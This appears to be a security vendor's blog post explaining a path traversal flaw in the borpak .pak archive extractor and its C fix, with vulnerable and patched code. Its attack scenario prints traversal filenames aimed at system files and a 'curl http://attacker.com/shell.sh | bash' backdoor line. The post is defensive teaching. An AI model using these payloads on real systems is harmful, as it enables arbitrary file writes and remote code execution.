Back to Blog
medium SEVERITY5 min read

How path traversal happens in C file extraction and how to fix it

A path traversal vulnerability in the borpak archive extraction tool allowed attackers to write files to arbitrary locations on the filesystem by crafting malicious .pak archives with `../` sequences in filenames. This medium-severity issue in `tools/borpak/source/borpak.c` could enable system compromise through overwriting critical files like `.bashrc` or cron jobs. The fix implements path validation to ensure extracted files never escape the intended extraction directory.

O
By Orbis AppSec
Published June 7, 2026Reviewed June 7, 2026

Answer Summary

Path traversal (CWE-22) in C file extraction occurs when archive filenames containing `../` sequences are used directly without sanitization, allowing writes outside the target directory. In borpak.c, the fix validates that resolved paths stay within the extraction root by checking for traversal patterns like `../`, `..\\`, and URL-encoded variants (`%2e%2e`), then verifying the final path starts with the intended root directory using `realpath()`.

Vulnerability at a Glance

cweCWE-22
fixValidate extracted paths stay within the declared extraction root directory
riskArbitrary file write leading to system compromise
languageC
root causeFilenames from .pak archives used directly without path sanitization
vulnerabilityPath Traversal (Directory Traversal)

Introduction

The borpak tool handles extraction of .pak archive files, reading filenames from the archive and creating output files accordingly. However, a critical flaw at line 302 of tools/borpak/source/borpak.c allowed attackers to escape the intended extraction directory entirely. When extracting files, the code used memcpy to copy filenames directly from the archive without any sanitization—meaning a malicious archive containing ../../../etc/cron.d/malicious as a filename would write directly to that path.

This vulnerability is particularly dangerous because archive extraction is often performed with elevated privileges or in automated pipelines. A developer downloading and extracting a seemingly innocent game mod or resource pack could unknowingly compromise their entire system.

The Vulnerability Explained

When borpak extracts files from a .pak archive, it reads the filename stored in the archive header and uses it to construct the output path. The original code performed something like:

// Vulnerable pattern in borpak.c:302
char output_path[4096];
snprintf(output_path, sizeof(output_path), "%s/%s", extract_dir, pak_entry->filename);
// pak_entry->filename comes directly from the archive with no validation
FILE *out = fopen(output_path, "wb");

The problem? The pak_entry->filename is attacker-controlled data read directly from the archive. An attacker crafting a malicious .pak file could include entries like:

  • ../../../etc/passwd - Read system password file
  • ../../home/user/.bashrc - Inject malicious shell commands
  • ../../../etc/cron.d/backdoor - Install persistent backdoor
  • ....//....//etc/shadow - Double-dot variation to bypass naive filters

Real Attack Scenario

Imagine a game modding community where users share .pak files containing textures and models. An attacker creates a mod called "HD_Textures.pak" with these entries:

textures/grass.png          (legitimate file)
textures/stone.png          (legitimate file)
../../../home/user/.bashrc  (malicious payload)

When a user runs borpak -x HD_Textures.pak -d ./mods/, the tool extracts the textures normally but also writes to .bashrc, injecting:

curl http://attacker.com/shell.sh | bash &

The next time the user opens a terminal, the backdoor executes.

The Fix

The fix implements a path_stays_within_root() validation function that ensures no extracted file can escape the intended directory. Here's the security logic added:

static int path_stays_within_root(const char *root, const char *filename)
{
    char combined[4096];

    snprintf(combined, sizeof(combined), "%s/%s", root, filename);

    /* Normalize: check if the combined path, when resolved, starts with root */
    char *rp = realpath(root, NULL);
    if (!rp) return 0;

    /* Manually resolve ../ components to check containment */
    char *res = realpath(combined, NULL);
    if (res) {
        int contained = (strncmp(res, rp, strlen(rp)) == 0);
        free(res);
        free(rp);
        return contained;
    }

    /* If file doesn't exist, do string-based check for traversal */
    int has_traversal = (strstr(filename, "../") != NULL ||
                         strstr(filename, "..\\") != NULL ||
                         strstr(filename, "%2e%2e") != NULL ||
                         strstr(filename, "....//") != NULL);
    free(rp);
    return !has_traversal;
}

Key Security Improvements

  1. Path Resolution: Uses realpath() to resolve the combined path, eliminating symbolic links and ../ sequences
  2. Containment Check: Verifies the resolved path starts with the extraction root directory
  3. Pattern Detection: Falls back to string-based detection for traversal patterns when files don't yet exist
  4. Multiple Encoding Coverage: Catches ../, ..\\ (Windows), URL-encoded %2e%2e, and double-dot variations like ....//

Before vs After

Before (Vulnerable):

// pak_entry->filename used directly - DANGEROUS
snprintf(output_path, sizeof(output_path), "%s/%s", extract_dir, pak_entry->filename);
fopen(output_path, "wb");

After (Secure):

// Validate path stays within extraction directory
if (!path_stays_within_root(extract_dir, pak_entry->filename)) {
    fprintf(stderr, "Error: Path traversal detected in '%s'\n", pak_entry->filename);
    continue; // Skip malicious entry
}
snprintf(output_path, sizeof(output_path), "%s/%s", extract_dir, pak_entry->filename);
fopen(output_path, "wb");

Prevention & Best Practices

1. Never Trust Archive Contents

Archive filenames, sizes, and metadata are all attacker-controlled. Treat them as untrusted input:

// Always validate before use
if (contains_path_traversal(filename) || strlen(filename) > MAX_FILENAME) {
    reject_entry();
}

2. Use Canonical Path Comparison

Always resolve paths to their canonical form before comparison:

char *canonical_root = realpath(extract_dir, NULL);
char *canonical_file = realpath(full_path, NULL);
if (strncmp(canonical_file, canonical_root, strlen(canonical_root)) != 0) {
    // Path escapes root - reject
}

3. Consider Allowlisting

For known archive formats, validate filenames against expected patterns:

// Only allow alphanumeric, dots, slashes (no backslashes or special chars)
if (!is_valid_filename_pattern(filename)) {
    reject_entry();
}

4. Use Secure Extraction Libraries

Modern libraries like libarchive include built-in protection against path traversal when configured correctly:

archive_read_extract_set_skip_file(a, dev, ino);
archive_read_extract(a, entry, ARCHIVE_EXTRACT_SECURE_NODOTDOT);

Key Takeaways

  • Archive filenames are attacker-controlled: The pak_entry->filename in borpak came directly from the archive without any validation
  • realpath() is essential for path validation: String-based checks alone miss edge cases; always resolve to canonical paths
  • Check multiple traversal encodings: Attackers use ../, ..\\, %2e%2e, ....//, and Unicode variants
  • Extraction tools need defense-in-depth: Even if one check fails, containment verification catches the escape
  • Regression tests with attack payloads are critical: The new test suite covers ../../../etc/passwd, ....// variations, and URL-encoded attacks

How Orbis AppSec Detected This

  • Source: Filename data read from .pak archive entries via memcpy in borpak.c
  • Sink: fopen() and file write operations at tools/borpak/source/borpak.c:302 using unsanitized paths
  • Missing control: No validation that constructed file paths stayed within the extraction directory
  • CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
  • Fix: Added path_stays_within_root() function that validates paths using realpath() resolution and pattern detection for traversal sequences

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.

Conclusion

Path traversal in archive extraction is a classic vulnerability that continues to affect modern codebases. The borpak fix demonstrates the proper approach: resolve paths to their canonical form, verify containment within the intended directory, and catch multiple encoding variations of traversal sequences. When handling any archive format—whether .pak, .zip, .tar, or others—always treat filenames as untrusted input and validate before writing.

References

Frequently Asked Questions

What is path traversal?

Path traversal is a vulnerability where attackers manipulate file paths using sequences like `../` to access or write files outside intended directories, potentially compromising system files.

How do you prevent path traversal in C?

Validate paths by resolving them with `realpath()`, checking for traversal sequences (`../`, `..\\`, URL-encoded variants), and verifying the final path starts with the intended root directory.

What CWE is path traversal?

CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) covers path traversal vulnerabilities.

Is checking for `../` enough to prevent path traversal?

No, attackers use variations like `..\\`, `....//`, URL-encoded `%2e%2e%2f`, and Unicode representations. You must normalize paths and verify containment after resolution.

Can static analysis detect path traversal?

Yes, static analysis tools can detect path traversal by tracking tainted input from archive filenames to file operations and flagging missing sanitization.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #346

Related Articles

critical

How command injection happens in Python subprocess and how to fix it

A critical command injection vulnerability was discovered in a CGI script that processed HTTP requests using `subprocess.check_output()` with `shell=True`. Attackers could inject arbitrary shell commands through URL parameters using metacharacters like semicolons, pipes, or backticks. The fix converts the command from a string to a list and sets `shell=False`, preventing shell interpretation of user input.

critical

How buffer overflow in URL parsing happens in C++ HTTP client and how to fix it

A critical buffer overflow vulnerability in the HTTP client's URL parsing function allowed attackers to overflow a stack-allocated host buffer through specially crafted URLs with excessively long hostnames. The vulnerability enabled arbitrary code execution by overwriting the return address. The fix adds proper bounds validation before the memcpy() operation to ensure the hostname length never exceeds the destination buffer size.

critical

How integer overflow in _wopendir() happens in C Windows dirent and how to fix it

A critical integer overflow vulnerability in `include/compat/dirent_msvc.h` allowed an attacker-controlled directory path length to wrap the `sizeof(wchar_t) * n + 16` allocation calculation, resulting in a dangerously undersized heap buffer. Subsequent writes to that buffer caused a heap overflow, enabling potential memory corruption or code execution on Windows systems. The fix adds a pre-allocation bounds check and proper errno signaling to safely reject overflow-inducing inputs.

critical

How buffer overflow happens in C xxd utility and how to fix it

A critical buffer overflow vulnerability was discovered in the xxd utility's `xxdline()` function where `strcpy()` was used without bounds checking on file input. An attacker could craft a malicious hex dump file with oversized lines to trigger memory corruption. The fix replaces the unsafe `strcpy()` with `snprintf()` to enforce buffer size limits.

critical

How buffer overflow in memcpy() happens in C/C++ embedded firmware and how to fix it

A critical buffer overflow vulnerability was discovered in the ESP32-based micro-journal firmware where `memcpy()` calls used `strlen()` without bounds checking, allowing oversized USB descriptor strings to corrupt adjacent memory. The fix replaces unbounded `strlen()` with `strnlen()` calls that enforce the destination buffer sizes (8, 16, and 4 bytes respectively), preventing heap/stack corruption from malicious USB devices.

high

How Denial of Service via crafted URI templates happens in Ruby addressable and how to fix it

A high-severity Denial of Service vulnerability (CVE-2026-35611) was discovered in the Ruby `addressable` gem versions prior to 2.9.0, which could allow attackers to crash or hang applications by sending specially crafted URI templates. The fix upgrades the dependency from version 2.8.7 to 2.9.0 across the Gemfile, Gemfile.lock, and gemspec in a Fastlane project, eliminating the vulnerable code path entirely.